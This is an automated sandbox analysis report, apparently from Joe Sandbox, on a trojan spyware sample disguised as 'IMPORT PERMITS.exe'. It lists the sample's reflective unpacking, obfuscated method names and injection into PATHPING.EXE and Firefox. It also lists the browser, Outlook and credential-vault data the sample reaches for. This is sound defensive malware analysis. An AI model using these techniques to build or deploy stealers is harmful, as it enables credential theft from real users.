                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, SSO9hfyRu5sPNhP9Tv.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, uJ2cQeL7dCfAKUv4kg.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/11
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IMPORT PERMITS.exe.logJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\PATHPING.EXEFile created: C:\Users\user\AppData\Local\Temp\6276I39Jump to behavior
                Source: IMPORT PERMITS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: IMPORT PERMITS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: PATHPING.EXE, 00000007.00000003.2235989235.0000000000726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINXgrENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PATHPING.EXE, 00000007.00000002.4120881456.0000000000747000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2235989235.0000000000747000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: IMPORT PERMITS.exeReversingLabs: Detection: 68%
                Source: IMPORT PERMITS.exeVirustotal: Detection: 55%
                Source: unknownProcess created: C:\Users\user\Desktop\IMPORT PERMITS.exe "C:\Users\user\Desktop\IMPORT PERMITS.exe"
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess created: C:\Users\user\Desktop\IMPORT PERMITS.exe "C:\Users\user\Desktop\IMPORT PERMITS.exe"
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeProcess created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess created: C:\Users\user\Desktop\IMPORT PERMITS.exe "C:\Users\user\Desktop\IMPORT PERMITS.exe"Jump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeProcess created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: IMPORT PERMITS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: IMPORT PERMITS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: IMPORT PERMITS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: GPUK.pdbSHA256 source: IMPORT PERMITS.exe
                Source: Binary string: pathping.pdb source: IMPORT PERMITS.exe, 00000002.00000002.2056786329.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000002.4121260219.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gKZXbGXeVZyo.exe, 00000006.00000000.1970482596.000000000071E000.00000002.00000001.01000000.0000000C.sdmp, gKZXbGXeVZyo.exe, 00000008.00000000.2122498147.000000000071E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: pathping.pdbGCTL source: IMPORT PERMITS.exe, 00000002.00000002.2056786329.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000002.4121260219.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: IMPORT PERMITS.exe, 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2056921081.0000000002944000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2059145446.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: IMPORT PERMITS.exe, IMPORT PERMITS.exe, 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, PATHPING.EXE, 00000007.00000003.2056921081.0000000002944000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2059145446.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: GPUK.pdb source: IMPORT PERMITS.exe

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: IMPORT PERMITS.exe, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: IMPORT PERMITS.exe, MainForm.cs.Net Code: InitializeComponent
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, SSO9hfyRu5sPNhP9Tv.cs.Net Code: LB9tOSR4ba System.Reflection.Assembly.Load(byte[])
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, SSO9hfyRu5sPNhP9Tv.cs.Net Code: LB9tOSR4ba System.Reflection.Assembly.Load(byte[])
                Source: 0.2.IMPORT PERMITS.exe.5360000.3.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, SSO9hfyRu5sPNhP9Tv.cs.Net Code: LB9tOSR4ba System.Reflection.Assembly.Load(byte[])
                Source: 0.2.IMPORT PERMITS.exe.3a00b90.2.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 7.2.PATHPING.EXE.32ccd14.2.raw.unpack, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 7.2.PATHPING.EXE.32ccd14.2.raw.unpack, MainForm.cs.Net Code: InitializeComponent
                Source: 8.2.gKZXbGXeVZyo.exe.33acd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 8.2.gKZXbGXeVZyo.exe.33acd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent
                Source: 8.0.gKZXbGXeVZyo.exe.33acd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 8.0.gKZXbGXeVZyo.exe.33acd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent
                Source: 9.2.firefox.exe.158cd14.0.raw.unpack, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 9.2.firefox.exe.158cd14.0.raw.unpack, MainForm.cs.Net Code: InitializeComponent
                Source: IMPORT PERMITS.exeStatic PE information: 0x8FE9D11E [Fri Jul 6 04:48:30 2046 UTC]
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 0_2_029368DC pushad ; iretd 0_2_029368DD
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0041187B push edx; iretd 2_2_00411881
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00405808 push 147E0EDDh; iretd 2_2_0040580F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_004051E4 push esi; ret 2_2_004051E5
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_004153EB push ebx; iretd 2_2_0041540B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00415B81 push ebp; ret 2_2_00415BE6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0040B40A pushad ; retf 2_2_0040B40B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00403420 push eax; ret 2_2_00403422
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_004175E8 push ds; iretd 2_2_004175F1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00413E64 push ds; retf 2_2_00413E6E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00415FC0 pushfd ; retf 2_2_00415FC6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00417FFB push cs; retf 2_2_0041801A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013B225F pushad ; ret 2_2_013B27F9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013B27FA pushad ; ret 2_2_013B27F9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E09AD push ecx; mov dword ptr [esp], ecx2_2_013E09B6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013B283D push eax; iretd 2_2_013B2858
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013B1344 push eax; iretd 2_2_013B1369
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA225F pushad ; ret 7_2_02CA27F9
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA27FA pushad ; ret 7_2_02CA27F9
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA283D push eax; iretd 7_2_02CA2858
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CD09AD push ecx; mov dword ptr [esp], ecx7_2_02CD09B6
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA1200 push edx; retf 0002h7_2_02CA1206
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA135E push eax; iretd 7_2_02CA1369
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA1BC7 push eax; retf 7_2_02CA1BBE
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA1BB7 push eax; retf 7_2_02CA1BBE
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA18A7 push ds; retf 7_2_02CA198E
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA19DB push 262802DCh; retf 7_2_02CA19EA
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_004141C5 push ds; iretd 7_2_004141CE
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_004023E5 push 147E0EDDh; iretd 7_2_004023EC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0040E458 push edx; iretd 7_2_0040E45E
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00414BD8 push cs; retf 7_2_00414BF7
                Source: IMPORT PERMITS.exeStatic PE information: section name: .text entropy: 7.935527441310873
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, s1rCFR8N03xdpUgBPW.csHigh entropy of concatenated method names: 'Dispose', 'EJgao0l62P', 'hcUlAmgGiM', 'I5syyQDYAG', 'q9laK13CTW', 'JlDazCopno', 'ProcessDialogKey', 'KiIl7fTd7A', 'RTNlaHXIiE', 'yOEllxeprK'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, aPVkC3sUY9THDneml7.csHigh entropy of concatenated method names: 'GdGFLi57HZ', 'fHUFC78mcK', 'vfdF5kKxyo', 'qGKFAp6Qye', 'T0iF1wcug9', 'PIrFc3WXFM', 'VsEFBdhd6w', 'sEFFPXiQiu', 'VegFmUtYQE', 'CE9F6YN5Xt'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, T2rwlHBY0HKnqPWuww.csHigh entropy of concatenated method names: 'SX40Y3welW', 'P5i0U8gSpX', 'vdw02938pl', 'EU32KfxF19', 'D6k2z4rPHY', 'f9M07HZciO', 'fmj0aUdOvG', 'PTZ0lcI3cX', 'pW80RoK3cM', 'v9v0t2Bxcw'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, B9cgSgaRKLldsKMyTfA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eaWwvs4B0m', 'N3AwdO7Boh', 'HplwTsrjq3', 'gfywEnPcR2', 'S7FwheQ2Cp', 'i8twVH6lwn', 'bEFwD7hv14'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, SSO9hfyRu5sPNhP9Tv.csHigh entropy of concatenated method names: 'buWRJ3unos', 'Iu4RY4bduh', 'Eu5R8Sk48L', 'NMwRUwC9qj', 'KhRRqoLFtt', 'iheR2cHvlq', 'pWMR0Sc4DA', 'UWlRyZ73bC', 'pkeR3PgvST', 'v3fRXa23wg'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, LI0umUlFURor33drKF.csHigh entropy of concatenated method names: 'HL2OEmHUo', 'j3rNDoAX7', 'YxwQZH0Kq', 'EPArkZRAT', 'vKYC8Vnyr', 'N59WtxeLu', 'DEN5FwVIA6TI21MvVs', 'FQhPIluPRhr2BS109H', 'Vpx9dkPRD', 'iChwhNVVa'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, uJ2cQeL7dCfAKUv4kg.csHigh entropy of concatenated method names: 'zid8vSFQts', 'xpQ8d4KEki', 'BnK8TFAFYc', 'qVx8EPt9qu', 'uns8h1CWGU', 'XwU8V4PG9O', 'qle8DyQZdm', 'TSX8H677SQ', 'EW78oUJTX0', 'EN88KZU6jK'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, BoHPZxa7RvNPmEtVpD7.csHigh entropy of concatenated method names: 'Sp2MnBRhl6', 'UNKMgVL3mc', 'AgHMOHTrYl', 'r5GMNik3gM', 'BSEMkGVIgt', 'iplMQXYs6r', 'lO9Mrm1lta', 'q3fMLJLyaf', 'J8nMCh17oH', 'clAMWcsqPQ'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, rl13CTHWclDCopnopi.csHigh entropy of concatenated method names: 'fJ49YL4Lg4', 'G5c98QYpan', 'qgF9Umc11j', 'VGS9qkLSkA', 'aDT92bjkEd', 'lNg90pIjeT', 'odZ9yBEpZQ', 'R8r93FE5Gu', 'c239X7UwOR', 'Vpa9ZJWVwY'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, N4bxquUbn13KJuaQkX.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UxGlooHnuS', 'FAelKQQjbD', 'jXslznt4Hv', 'kmfR7xHfo9', 'HatRav3Njl', 'L8gRlPtNKZ', 'zZ7RRToisB', 'Mb2MecD2AKmEIZ2DyA'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, ic7kMf5J3gC5EWCncN.csHigh entropy of concatenated method names: 'EyA2Jor71M', 'p6S28Uj5Uh', 'OKv2qWokxI', 'r6G20loIMw', 'iLl2yuqo8W', 'zkSqhcnc83', 'KGCqV3Vr7T', 'AyVqDlmbim', 'd8pqHOsS0e', 'EZwqofMCxG'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, dWUavZj6Tp68FDuP0Z.csHigh entropy of concatenated method names: 'Tuq0ntVily', 'DRe0gByrSI', 'SqB0OKBo1w', 'TVB0NVcbt8', 'ih80kU0DCj', 'dHm0QyHPwY', 'VF60rof79V', 'vBO0LKBHZ3', 'CwW0C8Ebhr', 'b1H0Whq6dN'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, weprK8KgFP2C2s7YhK.csHigh entropy of concatenated method names: 'wDaMacEejQ', 'B94MRlPv6F', 'UlWMtW5fvK', 'M7FMYlZPif', 'J6OM8pEAnC', 'BUyMqQ1EAU', 'OstM2vhY7f', 'go09DmxaIe', 'Opl9Hx53Wi', 'opN9oqJaYe'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, dSpHj0tkjS2ugiVHZX.csHigh entropy of concatenated method names: 'O44a0J2cQe', 'adCayfAKUv', 'UR9aXtaLdS', 'ImHaZPWHoP', 'kRTabl8qc7', 'BMfaeJ3gC5', 'eevwdYbWi6NKXbLXHg', 'fXY7gTsy8IAWpCEwIG', 'F44aaoZjut', 'svOaRrxlWM'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, bcXUthCR9taLdS1mHP.csHigh entropy of concatenated method names: 'zABUN4a6c8', 'AuDUQg6Nfd', 'C5oUL28bOm', 'OBYUC71kZX', 'FkUUbDDPEV', 'oqFUefcwwq', 'P2NUS49cCc', 'hhAU9WV75h', 'DlBUMc68Pw', 'viRUwf80KJ'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, cqhbasV4dMhUVe5Q0m.csHigh entropy of concatenated method names: 'YXrSHWk8kH', 'OswSKasPst', 'GXC97rlaaw', 'e4m9aarQdT', 'DilS612NGv', 'taSSunWYkG', 'JMESsx4hBS', 'V6rSviqY0L', 'UW0Sd594fL', 'i41STswsc5'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, r57vERvG1vGkubsFHp.csHigh entropy of concatenated method names: 'NrLbmvOxrD', 'idrbuM2La9', 'o2SbvicVQ7', 'tJ9bdekGW4', 'KGRbAm3gPu', 'eBxbGIqUqT', 'hIwb1pnUFs', 'I2Abc6iFqD', 'oFXbpS5kwK', 'TmrbBL8Ksk'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, xfTd7AovTNHXIiEgOE.csHigh entropy of concatenated method names: 'gkp95IY2o8', 'qba9AAIBLq', 'nOP9GkjAwF', 'wqk915IxVW', 'G7J9v1FIBB', 'nWo9cJupph', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, lBo05wT8L3jNjs3gvY.csHigh entropy of concatenated method names: 'ToString', 'gJEe6856JL', 'ikceAa21rY', 'ioFeGPgELq', 'YT1e1Rbpxb', 'spuece4PAi', 'c0AepudyJT', 'NEheBm65rQ', 'mBsePoN9w6', 'ORiejmNjq0'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, s1rCFR8N03xdpUgBPW.csHigh entropy of concatenated method names: 'Dispose', 'EJgao0l62P', 'hcUlAmgGiM', 'I5syyQDYAG', 'q9laK13CTW', 'JlDazCopno', 'ProcessDialogKey', 'KiIl7fTd7A', 'RTNlaHXIiE', 'yOEllxeprK'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, aPVkC3sUY9THDneml7.csHigh entropy of concatenated method names: 'GdGFLi57HZ', 'fHUFC78mcK', 'vfdF5kKxyo', 'qGKFAp6Qye', 'T0iF1wcug9', 'PIrFc3WXFM', 'VsEFBdhd6w', 'sEFFPXiQiu', 'VegFmUtYQE', 'CE9F6YN5Xt'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, T2rwlHBY0HKnqPWuww.csHigh entropy of concatenated method names: 'SX40Y3welW', 'P5i0U8gSpX', 'vdw02938pl', 'EU32KfxF19', 'D6k2z4rPHY', 'f9M07HZciO', 'fmj0aUdOvG', 'PTZ0lcI3cX', 'pW80RoK3cM', 'v9v0t2Bxcw'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, B9cgSgaRKLldsKMyTfA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eaWwvs4B0m', 'N3AwdO7Boh', 'HplwTsrjq3', 'gfywEnPcR2', 'S7FwheQ2Cp', 'i8twVH6lwn', 'bEFwD7hv14'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, SSO9hfyRu5sPNhP9Tv.csHigh entropy of concatenated method names: 'buWRJ3unos', 'Iu4RY4bduh', 'Eu5R8Sk48L', 'NMwRUwC9qj', 'KhRRqoLFtt', 'iheR2cHvlq', 'pWMR0Sc4DA', 'UWlRyZ73bC', 'pkeR3PgvST', 'v3fRXa23wg'
